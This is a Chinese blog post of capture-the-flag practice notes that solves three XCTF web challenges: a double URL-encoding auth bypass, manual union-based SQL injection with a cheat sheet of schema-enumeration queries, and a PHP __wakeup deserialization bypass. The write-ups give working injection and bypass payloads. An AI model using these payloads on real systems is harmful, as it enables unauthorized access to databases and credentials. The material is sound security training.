2020-12-16 xctf刷题记录

最新推荐文章于 2022-06-06 21:49:54 发布
最新推荐文章于 2022-06-06 21:49:54 发布
阅读量190 收藏
点赞数
分类专栏: ctf刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49503725/article/details/111304733
版权

前两天因为要准备考试,所以一不小心就给咕咕咕了Orz
今天进度也不怎么样
越来越担心完成不了任务了
但是今天的三道题又学会了新东西,还重新复习了之前学习的手工sql注入

PHP2

用dirsearch扫目录,发现了index.php
这里考查了第一个生僻知识点:phps文件就是php的源代码文件,通常用于提供给用户(访问者)直接通过Web浏览器查看php代码的内容。因为用户无法直接通过Web浏览器“看到”php文件的内容,所以需要用phps文件代替
于是访问/index.phps,查看源码

<?php
if("admin"===$_GET[id]) {
  echo("<p>not allowed!</p>");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "admin")
{
  echo "<p>Access granted!</p>";
  echo "<p>Key: xxxxxxx </p>";
}
?>

Can you anthenticate to this website?

“admin”===$_GET[id] 为False
$_GET[id] == “admin” 为True
才可以输出flag
这里考察第二个知识点是二次编码绕过

  • 当传入参数id时,浏览器在后面会对非ASCII码的字符(比如中文)进行一次urlencode
    然后if(“admin”===$_GET[id]) {
    echo(“

    not allowed!

    ”);
    exit();
    }这段代码运行时,会自动进行一次urldecode
    在urldecode()函数中,再一次进行一次解码

因此构造payload:?id=%2561dmin
不过一定一定要注意要返回index.php
完整payload

index.php?id=%2561dmin

NewsCenter

这个题有用sqlmap和手工注入两种解法,但是我的sqlmap用得还不够熟,所以先挖个坑(等考试周过完补)
先记录手工注入的解法

and 1=1  

and 1=2

以上均正常且无回显 说明存在注入

'   
报错 说明为字符型注入

'#   
正常且有回显 说明为单引号闭合

' order by 1#  
正常且有回显

' order by 2#  
正常且有回显

' order by 3# 
正常且有回显

' order by 4# 
报错 说明注入点在3,有3列

查库名
' and 1=2 union select 1,2,database()# 库名为news 

查表名
' and 1=2 union select 1,2,table_name from information_schema.tables where table_schema='news'# 
表名为secret_table

查列名
' and 1=2 union select 1,2,column_name from information_schema.columns where table_name='secret_table'# 
列名为fl4g,id,猜测flag应该在fl4g这一列中

查字段
' and 1=2 union select 1,2,fl4g from secret_table# 
得到flag

注意用union查询库名,表名,列名和字段名时,前面的语句要闭合,且不能被执行

一些常用的sql注入语句
查库select schema_name from information_schema.schemata
查表select table_name from information_schema.tables where table_schema=’’
查列 select column_name from information_schema.columns where table_name=’’
查字段 select 列名,列名from 库名.表名
limit a,b (a表示从a+1个数据库开始,b表示从查多少个)
查询各种权限的用户: select user()
select system_user()
select current_user()
查询当前数据库名称: select database()
查询数据库版本: select version()
查询数据库路径:select @@datadir
查询操作系统:select @@version_compile_os

unserialize3

首先补全源码

<?php
class xctf{  //类
public $flag = '111'; //public定义flag变量公开可见
public function __wakeup(){
exit('bad requests');
}
}
$a=new xctf();
echo(serialize($a));
?>
?code=

__wakeup 经常用在反序列化操作中,例如重新建立数据库连接,或执行其它初始化操作。
所以猜测传入参数的字符串肯定要被反序列化

将上面这个补全的php脚本去运行一下会得到flag的序列化字符串

O:4:"xctf":1:{s:4:"flag";s:3:"111";}

此时思路就清晰了
这道题考查反序列化__wakeup()函数漏洞利用:当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。
把上面的序列化字符串直接传参给code会被__wakeup()函数再次序列化,所以要绕过

这时我们要对序列化字符串的结构有所认识

O:< length >:"< class name >":< n >:{< field name 1 >< field value 1 >…< field name n >< field value n >}

O:表示序列化的事对象
< length >:表示序列化的类名称长度
< class name >:表示序列化的类的名称
< n >:表示被序列化的对象的属性个数
< field name 1 >:属性名
< field value 1 >:属性值

所以我们要将< n >的值改为2或以上
构造payload即可

好啦,就整理到这里啦,还有论文要肝呜呜呜,冲冲冲!

G0t1t
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2020.4.9 xctf(Cat)①
DSR446的博客
04-19 308
给url参数传入参数%80,Django报错,根据报错知道网站是Django开发  结合PHP可以通过在参数中注入@来读取文件的漏洞,首先看看配置文件settings.py,看看有没有相关的有用的信息。 Payload:?url=@/opt/api/api/settings.py 得到数据库名为 database.sqlite3 再获取数据库内容 Payload:?url=@/opt/api/...
2020.4.8 xctf(fakebook)
DSR446的博客
04-10 656
提示让我们注册一个账号,这里随便注册,注意一下blog的格式就行。 然后用我们注册好的账号进行登录。 登录后发现url 为 http://111.198.29.45:33988/view.php?no=1 ,第一时间想到是否存在sql注入,我们输入 ’ 根据报错的显示,可以肯定存在sql注入的,然后我们用 order by 语句判断查询的字段数目,以便于后续进行 union 查询, 先 ...
2020.3.29 xctf(NewsCenter)①
DSR446的博客
03-29 421
打开题目,有一处搜索框,搜索新闻。考虑xss或sql注入 这里我们介绍两种手动和sqlmap ①手动测: 我们这里先用order by 手动测字段数,发现当4的时候页面就不能正常显示了,所以这里应该是3。 查询当前数据库中的所有表名: 1' union select 1,2,group_concat(table_name) from information_schema.tables where ...
XCTF-2020CyBRICS部分逆向
re1wn
07-30 6152
XCTF-2020CyBRICS部分逆向
PHP反序列化漏洞
Ferryman23333的博客
10-20 247
开始之前先讲一讲为什么要序列化 序列化 将对象的状态信息转换为可以存储或传输的形式 反序列化 把字节序列转化为对象的过程 PHP反序列化漏洞 PHP5 < 5.6.25 PHP7 < 7.0.10 PHP官方给了示例:https://bugs.php.net/bug.php?id=72663 这个漏洞核心:序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeu...
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。...
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF-2019-tfboys:XCTF 2019最终网络任务“ tfboys”的源代码
05-18
XCTF-2019-tfboys tfboys又名TensorFlow Boys 部署(Python3) pip install -r requirements.txt cd web3 python run.py 迪尔斯 web3/model/default/ : pre-trained LSTM model. exploit/exploit.ipynb : codes...
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
攻防世界Web高手进阶区WP(unserialize3)
00勇士王子的博客
08-03 232
unserialize3 打开环境,是一段代码 function用于声明函数 PHP 的魔术方法函数 由上图可知,__wakeup()方法如果使用就是和unserialize()反序列化函数结合使用的,但是在题目代码中并没有序列化字符串。于是,我们这里实例化xctf类并对其使用序列化(这里就实例化xctf类为对象a) <?php class xctf{ //定义一个名为xctf的类 public $flag = '111'; /
系列2:14、PHP反序列化漏洞相关
qq_44704184的博客
04-18 2095
Magic函数 魔术方法是一种特殊的方法,当对对象执行某些操作时会覆盖PHP的默认操作。 下列方法名被认为是魔术方法: __construct()、destruct()、.call()、__callStatic()、__getl)、__set()、__isset()、___unset()、__sleep()、__wakeup()、__serialize()、__unserialize()、__toString0)、__invoke()、__set_state()、__clone()、__debugInfo(
CTF_Web:反序列化学习笔记(二)CTF经典考题由浅至深
AFCC_的博客(Web_Dog)
08-16 6431
0x00 CTF中的反序列化题目 这类题目中主要是利用反序列化各种魔术方法的绕过或调用,从而构造符合条件的序列化字符串,完成特定的功能,在这一点上对于整个代码段的执行流程要很清楚。我们先从最简单的开始看起。 0x01 攻防世界unserialize3 题目显示的源码为: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 在这里我们可以看到只有一个魔术方法,而__w
网安学习-反序列化漏洞
weixin_44770698的博客
06-06 824
初始序列化漏洞
oj.xctf.org.cn ctf平台的可供练习的题库
如梦山河
10-29 1949
链接地址是:http://oj.xctf.org.cn 平台会给我一些题库的链接,根据题库IP进行1-65535的端口扫描,会发现一些其他题 http://202.112.51.184:10085 http://202.112.51.184:10093 http://202.112.51.184:13080 http://202.112.51.184:15080 http://202.112...
攻防世界web高阶2分题(PHP2)
qq_45791542的博客
08-01 316
读题 一看懵了…不知道要干啥 参考大佬wp /index.phps发现代码泄露 查看源代码 分析代码: 第一步,要使得"admin"===$_GET[id]不成立 第二步,经过$_GET[id] = urldecode($_GET[id]);,使得$_GET[id] == "admin"成立。 具体 当传入参数id时,浏览器在后面会对非ASCII码的字符进行一次urlencode 然后在这段代码中运行时,会自动进行一次urldecode 在urldecode()函数中,再一次进
CTF如何入门
weixin_33806914的博客
04-22 1790
声明:文字整理自i春秋课程,感谢视频作者幻泉分享。 题目类型 Web Crypto PWN Misc stego forensic … Reverse PPC(Professonal ProgramCoder) 国际比赛:DEFCON资格赛 国内比赛:XCTF联赛 打CTF的意义 思维...
XCTF-攻防世界CTF平台-Web类——10、unserialize3(反序列化漏洞绕过__wakeup()函数)
Onlyone_1314的博客
11-21 2440
打开题目地址: 发现是一段残缺的php代码 题目名称unserialize3就是反序列化,要求我们通过反序列化漏洞绕过__wakeup()函数。 相关概念: 序列化:   序列化(Serialization)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。 php的序列化和反序列化   php的序列化和反序列化由serialize()和unserialize()这两个函数来完成。s
XCTF-web-新手区题目
Lorezon的博客
11-04 981
自我总结用 一:view_source 一般都是先看源码。 自己就出来了。 二:get_post 用hackbar 继续 完成。 三:robots 进去发现空白,什么都没有。根据题目robots,那就来查看robots协议: 再访问 f1ag_1s_h3re.php 完成。 四:backup 先来看常见的文件名后缀:常见的备份文件后缀名有.git、.svn、.swp、.~、.bak、.bash_...
实战环境下的网络空间安全教育:GMIC-XCTF京津冀邀请赛与人才培养
"GMIC-XCTF京津冀邀请赛是一场聚焦网络空间安全的竞赛,旨在通过实战环境锤炼网络空间安全人才,推动该领域的人才培养。比赛中,北京航空航天大学的Lancet战队脱颖而出,获得了冠军。本次赛事体现了网络安全教育的新...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值